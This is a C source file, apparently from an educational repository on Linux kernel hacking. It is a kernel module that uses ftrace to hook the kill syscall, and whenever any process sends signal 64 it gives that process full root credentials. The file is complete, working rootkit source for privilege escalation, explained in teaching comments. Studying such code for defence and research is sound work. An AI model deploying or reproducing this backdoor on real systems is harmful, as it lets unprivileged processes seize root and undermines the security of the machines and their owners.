linux_kernel_hacking/3_RootkitTechniques/3.3_set_root/rootkit.c at 3b5e18a1580d68326db6031dd9bf5bd3c233847f

Fork: 1

21a5032 / linux_kernel_hacking

forked from miura250/linux_kernel_hacking

Find file

Newer

Older

linux_kernel_hacking / 3_RootkitTechniques / 3.3_set_root / rootkit.c

Harvey Phillips on 25 Aug 2020 3 KB update version number

Raw Blame History

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("TheXcellerator");
MODULE_DESCRIPTION("Giving root privileges to a process");
MODULE_VERSION("0.02");

/* After Kernel 4.17.0, the way that syscalls are handled changed
 * to use the pt_regs struct instead of the more familiar function
 * prototype declaration. We have to check for this, and set a
 * variable for later on */
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

/* We now have to check for the PTREGS_SYSCALL_STUBS flag and
 * declare the orig_kill and hook_kill functions differently
 * depending on the kernel version. This is the largest barrier to 
 * getting the rootkit to work on earlier kernel versions. The
 * more modern way is to use the pt_regs struct. */
#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

/* We can only modify our own privileges, and not that of another
 * process. Just have to wait for signal 64 (normally unused) 
 * and then call the set_root() function. */
asmlinkage int hook_kill(const struct pt_regs *regs)
{
	void set_root(void);

	// pid_t pid = regs->di;
	int sig = regs->si;

	if ( sig == 64 )
	{
		printk(KERN_INFO "rootkit: giving root...\n");
		set_root();
		return 0;
	}

	return orig_kill(regs);

}
#else
/* This is the old way of declaring a syscall hook */
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
	void set_root(void);

	if ( sig == 64 )
	{
		printk(KERN_INFO "rootkit: giving root...\n");
		set_root();
		return 0;
	}

	return orig_kill(pid, sig);
}
#endif

/* Whatever calls this function will have it's creds struct replaced
 * with root's */
void set_root(void)
{
	/* prepare_creds returns the current credentials of the process */
	struct cred *root;
	root = prepare_creds();

	if (root == NULL)
		return;

	/* Run through and set all the various *id's to 0 (root) */
	root->uid.val = root->gid.val = 0;
	root->euid.val = root->egid.val = 0;
	root->suid.val = root->sgid.val = 0;
	root->fsuid.val = root->fsgid.val = 0;

	/* Set the cred struct that we've modified to that of the calling process */
	commit_creds(root);
}

/* Declare the struct that ftrace needs to hook the syscall */
static struct ftrace_hook hooks[] = {
	HOOK("sys_kill", hook_kill, &orig_kill),
};

/* Module initialization function */
static int __init rootkit_init(void)
{
	/* Hook the syscall and print to the kernel buffer */
	int err;
	err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
	if(err)
		return err;

	printk(KERN_INFO "rootkit: Loaded >:-)\n");

	return 0;
}

static void __exit rootkit_exit(void)
{
	/* Unhook and restore the syscall and print to the kernel buffer */
	fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
	printk(KERN_INFO "rootkit: Unloaded :-(\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);